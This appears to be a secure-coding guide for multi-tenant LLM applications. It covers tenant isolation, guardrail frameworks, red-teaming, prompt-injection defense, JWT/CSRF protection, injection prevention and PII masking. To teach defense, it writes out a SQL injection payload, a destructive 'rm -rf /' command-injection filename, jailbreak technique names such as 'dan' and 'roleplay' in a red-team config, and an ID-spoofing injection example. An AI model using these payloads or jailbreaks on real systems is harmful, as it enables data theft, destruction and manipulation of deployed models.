async def find_by_user(self) -> list[T]:
query = self._base_query().where(
self.model.user_id == self.ctx.user_id
)
result = await self.session.execute(query)
return result.scalars().all()

Vector Search with Tenant Isolation
async def semantic_search(query_embedding: list[float], ctx: RequestContext, limit: int = 10):
return await db.execute("""
SELECT id, content, 1 - (embedding <-> :query) as similarity
FROM documents
WHERE tenant_id = :tenant_id
AND user_id = :user_id
AND embedding <-> :query < 0.5
ORDER BY embedding <-> :query
LIMIT :limit
""", {
"tenant_id": ctx.tenant_id,
"user_id": ctx.user_id,
"query": query_embedding,
"limit": limit,
})

Caching with Tenant Isolation
def cache_key(ctx: RequestContext, operation: str, *args) -> str:
"""Cache keys MUST include tenant_id."""
return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"

Row-Level Security (PostgreSQL)
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
SET app.tenant_id = 'tenant-uuid-here';

Audit Logging
import hashlib
import re

class SanitizedLogger:
    REDACT_PATTERNS = {
        r"password": "[PASSWORD_REDACTED]",
        r"api[_-]?key": "[API_KEY_REDACTED]",
        r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
    }
    HASH_FIELDS = {"prompt", "response", "content"}  # hashed, never logged raw

    def _sanitize(self, fields: dict) -> dict:
        def clean(key, value):
            if key in self.HASH_FIELDS:
                return hashlib.sha256(str(value).encode()).hexdigest()[:16]
            for pattern, replacement in self.REDACT_PATTERNS.items():
                value = re.sub(pattern, replacement, str(value), flags=re.IGNORECASE)
            return value
        return {k: clean(k, v) for k, v in fields.items()}

    def audit(self, event: str, **kwargs):
        self._logger.info(event, audit=True, **self._sanitize(kwargs))

Anti-Patterns
# BAD: Mutable context
class RequestContext:
user_id: UUID # Can be changed!
# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."
# BAD: Global query without tenant filter
async def find_all():
return await db.execute("SELECT * FROM documents")
# BAD: Tenant filter as optional
async def find(tenant_id: UUID | None = None):
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
return await db.find(tenant_id=ctx.tenant_id)

Testing Tenant Isolation
async def test_tenant_a_cannot_see_tenant_b_documents(tenant_a_ctx, tenant_b_ctx):
doc = Document(tenant_id=tenant_b_ctx.tenant_id, content="Secret data")
db_session.add(doc)  # Session.add() is synchronous; only flush/commit are awaited
await db_session.flush()
repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
result = await repo.find_by_id(doc.id)
assert result is None # Tenant A cannot see tenant B's data

Incorrect — Optional tenant filtering allows cross-tenant data access:
async def find_documents(tenant_id: UUID | None = None):
query = select(Document)
if tenant_id: # Can be bypassed by omitting parameter
query = query.where(Document.tenant_id == tenant_id)
return await session.execute(query)

Correct — Immutable RequestContext makes tenant filtering mandatory and tamper-proof:
async def find_documents(ctx: RequestContext):
# Tenant filter is mandatory via immutable context
query = select(Document).where(
Document.tenant_id == ctx.tenant_id # Cannot be bypassed
)
return await session.execute(query)

LLM Red-Teaming and OWASP LLM Compliance — CRITICAL
LLM Red-Teaming and OWASP LLM Compliance
Incorrect -- shipping LLM system without adversarial testing:
# Only testing happy path, no adversarial inputs
def test_chatbot():
response = chatbot.respond("What's the weather?")
assert response # No jailbreak, injection, or bias testing!

Correct -- DeepTeam red-teaming audit:
from deepteam import red_team
from deepteam.vulnerabilities import (
Bias, Toxicity, PIILeakage,
PromptInjection, Jailbreaking,
Misinformation, CompetitorEndorsement
)
async def run_red_team_audit(target_model: callable, attacks_per_vulnerability: int = 10) -> dict:
results = await red_team(
model=target_model,
vulnerabilities=[
Bias(categories=["gender", "race", "religion", "age"]),
Toxicity(threshold=0.7),
PIILeakage(types=["email", "phone", "ssn", "credit_card"]),
PromptInjection(techniques=["direct", "indirect", "context"]),
Jailbreaking(multi_turn=True, techniques=["dan", "roleplay", "context_manipulation"]),
Misinformation(domains=["health", "finance", "legal"]),
],
attacks_per_vulnerability=attacks_per_vulnerability,
)
return {
"total_attacks": results.total_attacks,
"successful_attacks": results.successful_attacks,
"attack_success_rate": results.successful_attacks / results.total_attacks,
"vulnerabilities": [
{"type": v.type, "severity": v.severity, "mitigation": v.suggested_mitigation}
for v in results.vulnerabilities
],
}

OWASP Top 10 for LLMs mapping:
| OWASP LLM Risk | Guardrail Solution |
|---|---|
| LLM01: Prompt Injection | NeMo input rails, Guardrails AI validators |
| LLM02: Insecure Output | Output rails, structured validation |
| LLM04: Model Denial of Service | Rate limiting, token budgets, timeout rails |
| LLM06: Sensitive Info Disclosure | PII detection, context separation |
| LLM07: Insecure Plugin Design | Tool validation, permission boundaries |
| LLM08: Excessive Agency | Human-in-loop rails, action confirmation |
| LLM09: Overreliance | Factuality checking, confidence thresholds |
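As a concrete sketch of the LLM04 row (rate limiting and token budgets), a per-user sliding-window budget gate might look like this; the class name, limits, and window are illustrative assumptions, not from any specific framework:

```python
import time
from collections import defaultdict

class TokenBudgetGate:
    """Reject requests once a user exhausts their token budget for the window."""

    def __init__(self, max_tokens_per_window: int = 50_000, window_seconds: int = 3600):
        self.max_tokens = max_tokens_per_window
        self.window = window_seconds
        self._usage: dict[str, list[tuple[float, int]]] = defaultdict(list)

    def check(self, user_id: str, requested_tokens: int) -> bool:
        now = time.monotonic()
        # Drop usage entries that fell outside the sliding window
        self._usage[user_id] = [
            (ts, n) for ts, n in self._usage[user_id] if now - ts < self.window
        ]
        used = sum(n for _, n in self._usage[user_id])
        if used + requested_tokens > self.max_tokens:
            return False  # LLM04 mitigation: refuse before calling the model
        self._usage[user_id].append((now, requested_tokens))
        return True
```

Call `gate.check(user_id, estimated_tokens)` before every model invocation and return HTTP 429 on False.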
Framework comparison:
| Framework | Best For | Key Features |
|---|---|---|
| NeMo Guardrails | Programmable flows, Colang 2.0 | Input/output rails, fact-checking |
| Guardrails AI | Validator-based, modular | 100+ validators, PII, toxicity |
| OpenAI Guardrails | Drop-in wrapper | Simple integration |
| DeepTeam | Red teaming, adversarial | 40+ vulnerabilities, GOAT attacks |
Key decisions:
- Red-teaming frequency: Pre-release + quarterly
- Fact-checking: Required for factual domains (health, finance, legal)
- DeepTeam for 40+ vulnerability types with OWASP alignment
- Always test multi-turn jailbreaking (GOAT-style attacks)
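One way to enforce the pre-release cadence is a CI gate over the summary dict returned by run_red_team_audit above; the function name and the 5% threshold here are assumptions:

```python
def assert_red_team_passed(audit: dict, max_success_rate: float = 0.05) -> None:
    """Fail the build if the adversarial attack success rate exceeds the threshold."""
    rate = audit["attack_success_rate"]
    if rate > max_success_rate:
        critical = [v for v in audit["vulnerabilities"] if v.get("severity") == "critical"]
        raise AssertionError(
            f"Red-team gate failed: {rate:.1%} attack success rate "
            f"({len(critical)} critical findings)"
        )
```

Wire this into the release pipeline so a regression in jailbreak resistance blocks the deploy rather than surfacing in production.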
Deploy NeMo Guardrails and Guardrails AI to defend against prompt injection and toxicity — CRITICAL
NeMo Guardrails and Guardrails AI
Incorrect — returning raw LLM output without validation:
# No input sanitization, no output validation
user_input = request.json["message"]
response = llm.generate(user_input) # Prompt injection risk!
return response # Raw, unvalidated output!

Correct — NeMo Guardrails with Guardrails AI integration:
# config.yml
models:
- type: main
engine: openai
model: gpt-5.2
rails:
config:
guardrails_ai:
validators:
- name: toxic_language
parameters:
threshold: 0.5
validation_method: "sentence"
- name: guardrails_pii
parameters:
entities: ["phone_number", "email", "ssn", "credit_card"]
- name: restricttotopic
parameters:
valid_topics: ["technology", "support"]
input:
flows:
- guardrailsai check input $validator="guardrails_pii"
output:
flows:
- guardrailsai check output $validator="toxic_language"
- guardrailsai check output $validator="restricttotopic"

Correct — Colang 2.0 fact-checking rails:
define flow answer question with facts
"""Enable fact-checking for RAG responses."""
user ...
$answer = execute rag()
$check_facts = True
bot $answer
define flow check hallucination
"""Block responses about people without verification."""
user ask about people
$check_hallucination = True
bot respond about people

Correct — Guardrails AI validators in Python:
from guardrails import Guard
from guardrails.hub import ToxicLanguage, DetectPII, RestrictToTopic, ValidLength
guard = Guard().use_many(
ToxicLanguage(threshold=0.5, on_fail="filter"),
DetectPII(pii_entities=["EMAIL_ADDRESS", "PHONE_NUMBER", "SSN"], on_fail="fix"),
RestrictToTopic(valid_topics=["technology", "support"], on_fail="refrain"),
ValidLength(min=10, max=500, on_fail="reask"),
)
# Always validate BOTH input and output
input_result = guard.validate(user_input)
if not input_result.validation_passed:
return "Invalid input"
llm_output = llm.generate(input_result.validated_output)
output_result = guard(llm_api=openai.chat.completions.create, model="gpt-5.2",
messages=[{"role": "user", "content": user_input}])
if output_result.validation_passed:
return output_result.validated_output

Key decisions:
- NeMo for programmable flows (Colang 2.0), Guardrails AI for validators
- Toxicity threshold: 0.5 for content apps, 0.3 for children's apps
- PII handling: Redact for logs, block for outputs
- Topic restriction: Allowlist preferred over blocklist
- Always validate both input AND output
- Never use single validation layer
LLM: Content Filtering & Three-Phase Pattern — HIGH
Content Filtering & Three-Phase Pattern
The Three-Phase Pattern
Phase 1: PRE-LLM | Filter data, extract content, save refs
Phase 2: LLM CALL | Content-only prompt, no identifiers
Phase 3: POST-LLM | Validate output, attach attribution

Phase 1: Pre-LLM (Filter & Extract)
async def prepare_for_llm(query: str, ctx: RequestContext):
# 1. Retrieve with tenant filter
documents = await semantic_search(
query_embedding=embed(query),
ctx=ctx, # Filters by tenant_id, user_id
)
# 2. Save references for attribution
source_refs = SourceRefs(
document_ids=[d.id for d in documents],
chunk_ids=[c.id for d in documents for c in d.chunks],  # chunks exposed by each document
)
# 3. Extract content only (no IDs)
content_texts = [strip_identifiers(d.content) for d in documents]
return query, content_texts, source_refs
def strip_identifiers(text: str) -> str:
"""Remove any IDs from content."""
text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
for pattern in [r'user_id:\s*\S+', r'tenant_id:\s*\S+']:
text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
return text

Phase 2: LLM Call (Content Only)
def build_prompt(content: str, context_texts: list[str]) -> str:
prompt = f"""
Analyze the following content and provide insights.
CONTENT:
{content}
RELEVANT CONTEXT:
{chr(10).join(f"- {text}" for text in context_texts)}
"""
# AUDIT: Verify no IDs leaked
violations = audit_prompt(prompt)
if violations:
raise SecurityError(f"IDs leaked to prompt: {violations}")
return prompt
async def call_llm(prompt: str) -> dict:
"""LLM only sees content, never IDs."""
response = await llm.generate(prompt)
return parse_response(response)

Phase 3: Post-LLM (Attribute)
async def save_with_attribution(
llm_output: dict, ctx: RequestContext, source_refs: SourceRefs,
) -> Analysis:
"""Attribution is DETERMINISTIC, not LLM-generated."""
# Validate no IDs in output
if re.search(UUID_PATTERN, str(llm_output)):
raise SecurityError("LLM output contains hallucinated IDs")
return await Analysis.create(
id=uuid4(), # We generate
user_id=ctx.user_id, # From context
tenant_id=ctx.tenant_id, # From context
trace_id=ctx.trace_id, # From context
source_document_ids=source_refs.document_ids, # From pre-LLM
content=llm_output["analysis"], # From LLM
key_concepts=llm_output["key_concepts"], # From LLM
created_at=datetime.now(timezone.utc),
)

Complete Workflow
async def safe_analyze(query: str, ctx: RequestContext):
    # Phase 1: Pre-LLM
    query, content_texts, source_refs = await prepare_for_llm(query, ctx)
    # Phase 2: LLM Call
    prompt = build_prompt(query, content_texts)
    llm_output = await call_llm(prompt)
    # Phase 3: Post-LLM
    result = await save_with_attribution(
        llm_output=llm_output, ctx=ctx, source_refs=source_refs,
    )
    return result

Output Validation
After LLM returns, validate:
async def validate_output(llm_output: dict, context_texts: list[str]):
# 1. Schema validation
parsed = AnalysisOutput.model_validate(llm_output)
# 2. Guardrails
if await contains_toxic_content(parsed.content):
return ValidationResult(valid=False, reason="Toxic content")
# 3. Grounding check
if not is_grounded(parsed.content, context_texts):
return ValidationResult(valid=False, reason="Ungrounded claims")
# 4. No hallucinated IDs
if contains_uuid_pattern(parsed.content):
return ValidationResult(valid=False, reason="Hallucinated IDs")
return ValidationResult(valid=True)

Common Mistakes
# BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
doc_id = response["source_document"] # HALLUCINATED!
# BAD: Trusting LLM-provided IDs
artifact.user_id = llm_output["user_id"] # WRONG!
# GOOD: Attribution from our records
artifact.user_id = ctx.user_id # From JWT
artifact.sources = source_refs.doc_ids # From pre-LLM
artifact.id = uuid4() # We generate

Checklist Before Any LLM Call
- RequestContext available
- Data filtered by tenant_id and user_id
- Content extracted without IDs
- Source references saved
- Prompt passes audit
- Output validated before use
- Attribution uses context, not LLM output
Incorrect — Asking LLM for attribution leads to hallucinated document IDs:
prompt = f"Analyze this content and cite which documents support each claim."
response = await llm.generate(prompt)
# Save with LLM-generated document IDs
artifact.source_ids = response["document_ids"] # HALLUCINATED!

Correct — Save source references before LLM call, attach deterministically after:
# Phase 1: Save refs before LLM
docs = await semantic_search(query, ctx)
source_refs = [d.id for d in docs]
# Phase 2: LLM sees only content
response = await llm.generate(content_only_prompt)
# Phase 3: Attach saved refs
artifact.source_ids = source_refs # From our records, not LLM

Apply output guardrails with schema validation, grounding checks, and content safety filtering — HIGH
Output Guardrails
Purpose
After LLM returns, validate output before using it:
- Schema: Response matches expected structure
- No IDs: No hallucinated UUIDs
- Grounded: Claims supported by provided context
- Safe: No toxic/harmful content
- Size: Within limits
Schema Validation
from pydantic import BaseModel, ValidationError
def validate_schema(llm_output: dict, schema: type[BaseModel]):
try:
parsed = schema.model_validate(llm_output)
return parsed, ValidationResult(status="passed")
except ValidationError as e:
return None, ValidationResult(
status="failed",
reason=f"Schema error: {e.error_count()} errors",
)
class AnalysisOutput(BaseModel):
summary: str
key_concepts: list[str]
difficulty: str

No Hallucinated IDs
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def validate_no_ids(output: str) -> ValidationResult:
uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
if uuids:
return ValidationResult(
status="failed",
reason=f"Found {len(uuids)} hallucinated UUIDs",
)
return ValidationResult(status="passed")

Grounding Validation
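The grounding check below calls an extract_key_terms helper that the excerpt never defines. One minimal possibility, where the stopword set and the three-letter token rule are simplifying assumptions:

```python
import re

_STOPWORDS = {
    "the", "and", "for", "are", "was", "with", "that", "this",
    "from", "has", "have", "its", "not", "but", "can", "will",
}

def extract_key_terms(text: str) -> list[str]:
    """Lowercase word tokens with stopwords and short tokens removed."""
    tokens = re.findall(r"[a-zA-Z]{3,}", text.lower())
    return [t for t in tokens if t not in _STOPWORDS]
```

A production system would likely use lemmatization or embeddings for grounding, but even this cheap term overlap catches responses that wander entirely away from the retrieved context.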
def validate_grounding(output: str, context_texts: list[str], threshold: float = 0.3):
output_terms = set(extract_key_terms(output))
context_terms = set()
for text in context_texts:
context_terms.update(extract_key_terms(text))
if not output_terms:
return ValidationResult(status="warning", reason="No key terms")
overlap = len(output_terms & context_terms) / len(output_terms)
if overlap < threshold:
return ValidationResult(
status="warning",
reason=f"Low grounding: {overlap:.2%}",
)
return ValidationResult(status="passed")

Content Safety
async def validate_content_safety(output: str):
# PII detection
pii_patterns = {
"email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
"phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
"ssn": r'\b\d{3}-\d{2}-\d{4}\b',
}
detected_pii = []
for pii_type, pattern in pii_patterns.items():
if re.search(pattern, output):
detected_pii.append(pii_type)
if detected_pii:
return ValidationResult(
status="warning",
reason=f"PII detected: {detected_pii}",
)
return ValidationResult(status="passed")

Combined Validator
async def run_guardrails(
llm_output: dict,
context_texts: list[str],
schema: type[BaseModel],
) -> tuple[BaseModel | None, list[ValidationResult]]:
results = []
# 1. Schema
parsed, result = validate_schema(llm_output, schema)
results.append(result)
if not result.is_valid:
return None, results
output_str = str(llm_output)
# 2. No hallucinated IDs
results.append(validate_no_ids(output_str))
# 3. Grounding check
results.append(validate_grounding(output_str, context_texts))
# 4. Content safety
results.append(await validate_content_safety(output_str))
# 5. Size limits
results.append(validate_size(output_str))
failures = [r for r in results if r.status == "failed"]
if failures:
return None, results
return parsed, results

Anti-Patterns
# BAD: No validation
artifact.content = llm_response["content"]
# BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response)
# BAD: Trusting LLM self-assessment
if llm_response.get("is_safe", True):
use_response(llm_response)
# GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
llm_output=response, context_texts=context, schema=AnalysisOutput,
)

Incorrect — Trusting LLM output without validation allows toxic content and hallucinated IDs:
response = await llm.generate(prompt)
analysis = Analysis(
content=response["summary"], # Could be toxic
document_id=response["doc_id"], # Hallucinated UUID!
)
await db.save(analysis)

Correct — Multi-layer guardrails validate schema, detect hallucinated IDs, and check grounding:
response = await llm.generate(prompt)
parsed, results = await run_guardrails(
llm_output=response, context_texts=context, schema=AnalysisOutput,
)
if not parsed:
raise ValidationError(f"Guardrails failed: {results}")
# Now safe to use parsed output

Defend against prompt injection by routing identifiers around the LLM, not through prompts — HIGH
Prompt Injection Defense
The Core Principle
Identifiers flow AROUND the LLM, not THROUGH it. The LLM sees only content. Attribution happens deterministically.
Why IDs in Prompts Are Dangerous
- Hallucination: LLM invents IDs that don't exist
- Confusion: LLM mixes up which ID belongs where
- Injection: Attacker manipulates IDs via prompt injection
- Leakage: IDs appear in logs, caches, traces
- Cross-tenant: LLM could reference other users' data
Forbidden Parameters in Prompts
| Parameter | Type | Why Forbidden |
|---|---|---|
| user_id | UUID | Hallucination risk, cross-user access |
| tenant_id | UUID | Critical for multi-tenant isolation |
| analysis_id | UUID | Job tracking, not for LLM |
| document_id | UUID | Source tracking, not for LLM |
| session_id | str | Auth context, not for LLM |
| api_key | str | Secret exposure |
| Any UUID | UUID | Pattern: [0-9a-f]{8}-... |
Detection Pattern
import re
FORBIDDEN_PATTERNS = [
r'user[_-]?id', r'tenant[_-]?id',
r'analysis[_-]?id', r'document[_-]?id',
r'session[_-]?id', r'trace[_-]?id',
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
]
def audit_prompt(prompt: str) -> list[str]:
violations = []
for pattern in FORBIDDEN_PATTERNS:
if re.search(pattern, prompt, re.IGNORECASE):
violations.append(pattern)
return violations

Safe Prompt Builder
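SafePromptBuilder below depends on an audit_text helper that this excerpt does not show. A minimal sketch reusing the FORBIDDEN_PATTERNS list (repeated here so the sketch is self-contained); the AuditResult shape is inferred from how the builder uses it:

```python
import re
from dataclasses import dataclass, field

FORBIDDEN_PATTERNS = [
    r'user[_-]?id', r'tenant[_-]?id',
    r'analysis[_-]?id', r'document[_-]?id',
    r'session[_-]?id', r'trace[_-]?id',
    r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
]

@dataclass
class AuditResult:
    critical_violations: list[str] = field(default_factory=list)

    @property
    def is_clean(self) -> bool:
        return not self.critical_violations

def audit_text(text: str) -> AuditResult:
    """Flag any forbidden identifier patterns found in a prompt fragment."""
    hits = [p for p in FORBIDDEN_PATTERNS if re.search(p, text, re.IGNORECASE)]
    return AuditResult(critical_violations=hits)
```

Returning the matched patterns (rather than a bare boolean) makes the SecurityError messages in the builder actionable.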
class SafePromptBuilder:
def __init__(self, strict: bool = True):
self._parts: list[str] = []
self._context: dict[str, Any] = {}
self._strict = strict
def add_system(self, instruction: str) -> "SafePromptBuilder":
audit = audit_text(instruction)
if not audit.is_clean:
raise PromptSecurityError("Forbidden content", audit.critical_violations)
self._parts.append(f"SYSTEM:\n{instruction}")
return self
def add_user_query(self, query: str) -> "SafePromptBuilder":
clean = self._sanitize(query)
self._parts.append(f"USER QUERY:\n{clean}")
return self
def add_context_documents(self, documents: list[str]) -> "SafePromptBuilder":
clean_docs = [self._sanitize(doc) for doc in documents]
formatted = "\n".join(f"- {doc}" for doc in clean_docs)
self._parts.append(f"CONTEXT:\n{formatted}")
return self
def store_context(self, key: str, value: Any) -> "SafePromptBuilder":
"""Store for attribution - NEVER included in prompt."""
self._context[key] = value
return self
def _sanitize(self, text: str) -> str:
text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
return text
def build(self) -> tuple[str, dict[str, Any]]:
prompt = "\n\n".join(self._parts)
audit = audit_text(prompt)
if not audit.is_clean:
raise PromptSecurityError(f"Final prompt forbidden: {audit.critical_violations}")
return prompt, self._context.copy()

Usage
prompt, context = (
SafePromptBuilder()
.add_system("You are an expert content analyzer.")
.add_user_query("What are the key concepts in machine learning?")
.add_context_documents(["Machine learning is a subset of AI..."])
.store_context("user_id", ctx.user_id) # Stored, NOT in prompt
.store_context("source_ids", doc_ids) # Stored, NOT in prompt
.build()
)

Common Mistakes
# BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"
# BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."
# GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"

Pre-LLM Checklist
- RequestContext obtained from JWT
- Data filtered by tenant_id and user_id
- Content extracted without IDs
- Source references saved for attribution
- audit_prompt() called on final prompt
- No violations detected
Incorrect — Including user_id in prompt allows injection and hallucination attacks:
prompt = f"""
Analyze the document for user {ctx.user_id}.
Tenant: {ctx.tenant_id}
Content: {user_content}
"""
# Attacker can inject: "user_id: <fake-uuid>" in content

Correct — Content-only prompts prevent ID leakage and injection vectors:
# Store context separately, never in prompt
context_data = {"user_id": ctx.user_id, "tenant_id": ctx.tenant_id}
prompt = f"Analyze the following content:\n{sanitized_content}"
# audit_prompt(prompt) passes — no IDs detected

Prevent JWT algorithm confusion, token sidejacking, CSRF, and session timing attacks — CRITICAL
Authentication & Session Attacks
JWT Algorithm Confusion
# VULNERABLE: Algorithm read from token header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret
# SAFE: Hardcode expected algorithm
def verify_jwt(token: str) -> dict:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'], # NEVER read from header
options={'require': ['exp', 'iat', 'iss', 'aud']},
)
if payload['iss'] != EXPECTED_ISSUER:
raise jwt.InvalidIssuerError()
if payload['aud'] != EXPECTED_AUDIENCE:
raise jwt.InvalidAudienceError()
return payload

Token Sidejacking Protection (OWASP)
def create_protected_token(user_id: str, response) -> str:
"""Token with fingerprint to prevent sidejacking."""
fingerprint = secrets.token_urlsafe(32)
payload = {
'user_id': user_id,
'fingerprint': hashlib.sha256(fingerprint.encode()).hexdigest(),
'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
'iat': datetime.now(timezone.utc),
'iss': ISSUER,
'aud': AUDIENCE,
}
# Send raw fingerprint as hardened cookie
response.set_cookie(
'__Secure-Fgp', fingerprint,
httponly=True, secure=True,
samesite='Strict', max_age=900,
)
return jwt.encode(payload, SECRET_KEY, algorithm='HS256')

CSRF Protection
# VULNERABLE: No CSRF protection
@app.post("/transfer")
async def transfer_money(to_account: str = Form(...), amount: float = Form(...)):
perform_transfer(to_account, amount)
# SAFE: CSRF token validation
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
if request.session.get("csrf_token") != csrf_token:
raise HTTPException(status_code=403, detail="CSRF token mismatch")
@app.post("/transfer")
async def transfer_money(
to_account: str = Form(...), amount: float = Form(...),
_: None = Depends(verify_csrf_token),
):
perform_transfer(to_account, amount)

# Alternative: SameSite cookies
response.set_cookie(
key="session_id", value=session_token,
httponly=True, secure=True,
samesite="strict", # Key CSRF protection
)

Timing Attack Prevention
# VULNERABLE: Character-by-character comparison
def check_password(stored_hash: str, provided_hash: str) -> bool:
for a, b in zip(stored_hash, provided_hash):
if a != b:
return False # Early exit reveals info
return True
# SAFE: Constant-time comparison
import hashlib
import hmac
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
return hmac.compare_digest(stored_hash, provided_hash)
# Better: Use a proper library
from argon2 import PasswordHasher
ph = PasswordHasher()
ph.verify(stored_hash, password) # Handles timing safely

Security Misconfiguration
# VULNERABLE: Debug mode in production
app.debug = True
# SAFE: Environment-based config
app.debug = os.getenv('FLASK_ENV') == 'development'
# VULNERABLE: CORS allow all
CORS(app, origins="*", allow_credentials=True)
# SAFE: Explicit origins
CORS(app, origins=["https://app.example.com"], allow_credentials=True)

Vulnerable Components
# Scan for vulnerabilities
npm audit
pip-audit
# Fix vulnerabilities
npm audit fix

JWT Security Checklist
- Hardcode algorithm (never read from header)
- Validate: exp, iat, iss, aud claims
- Short expiry (15 min - 1 hour)
- Use refresh token rotation for longer sessions
- Implement token denylist for logout/revocation
Detection
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .
# Missing SameSite cookies
grep -rn "set_cookie\|setCookie" --include="*.py" . | grep -v "samesite"
# CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .
# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .

Incorrect — reading JWT algorithm from untrusted token header:
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])

Correct — hardcoding expected algorithm with claim validation:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'],
options={'require': ['exp', 'iat', 'iss', 'aud']},
)

Summary
| Vulnerability | Bandit ID | Fix |
|---|---|---|
| SQL Injection | B608 | Parameterized queries |
| JWT Algorithm | N/A | Hardcode algorithm |
| Timing Attack | N/A | hmac.compare_digest |
| XSS | N/A | textContent, escape() |
| CSRF | N/A | SameSite cookies, tokens |
Prevent SQL, command, and SSRF injection with parameterized queries and input validation — CRITICAL
Injection Prevention
SQL Injection
Vulnerable — user input directly interpolated into query:
# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE email = '{email}'"

Safe — parameterized query and ORM:
# SAFE: Parameterized query
query = "SELECT * FROM users WHERE email = ?"
db.execute(query, [email])
# SAFE: ORM
db.query(User).filter(User.name == name).first()

SQL Injection Attack Demo
Vulnerable — f-string interpolation allows injection payload:
# Vulnerable endpoint
@app.get("/users/search")
def search_users(username: str = Query(...)):
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchall()
# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns ALL users

Safe — parameterized query prevents injection:
@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
return cursor.fetchall()

Command Injection
# VULNERABLE: User input in shell command
import os
os.system(f"convert {filename} output.png") # filename = "; rm -rf /"
# SAFE: subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

SSRF (Server-Side Request Forgery)
# VULNERABLE: Fetch any URL
response = requests.get(user_provided_url)
# SAFE: Allowlist domains
ALLOWED = ['api.example.com']
if urlparse(url).hostname not in ALLOWED:
abort(400)
response = requests.get(url)

Broken Access Control (IDOR)
# VULNERABLE: No authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
return db.query(Document).get(doc_id) # Anyone can access any doc
# SAFE: Authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
doc = db.query(Document).get(doc_id)
if doc.owner_id != current_user.id and not current_user.is_admin:
raise HTTPException(403, "Access denied")
return doc

Cryptographic Failures
# VULNERABLE: Weak hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()
# SAFE: Modern password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)

Insecure Deserialization
# VULNERABLE: Pickle from untrusted source
import pickle
data = pickle.loads(user_input) # Can execute arbitrary code
# SAFE: Use JSON
import json
data = json.loads(user_input) # Only parses data

Detection Commands
# Detect SQL injection patterns
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .
bandit -r . -t B608
# Detect command injection
semgrep --config "p/python-security-audit" .
# Detect SSRF
grep -rn "requests.get\|urllib.urlopen" --include="*.py" .

Incorrect — interpolating user input directly into SQL query:
query = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(query)

Correct — using parameterized query to prevent injection:
cursor.execute("SELECT * FROM users WHERE email = ?", (email,))

Quick Reference
| Vulnerability | Fix |
|---|---|
| SQL Injection | Parameterized queries, ORM |
| Command Injection | subprocess with list args |
| SSRF | URL domain allowlist |
| IDOR | Authorization check on every endpoint |
| Weak crypto | Argon2/bcrypt, not MD5/SHA1 |
| Insecure deserialization | JSON, not pickle |
Detect PII exposure through regex and ML-based patterns using Presidio and LLM Guard — HIGH
PII Detection Patterns
Regex-Based Detection
import re
def mask_pii(data, **kwargs):
"""Mask PII using regex patterns."""
if isinstance(data, str):
# Credit cards
data = re.sub(r'\b(?:\d[ -]*?){13,19}\b', '[REDACTED_CC]', data)
# Emails
data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
# Phone numbers
data = re.sub(r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b', '[REDACTED_PHONE]', data)
# SSN
data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
return data

Microsoft Presidio Pipeline
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
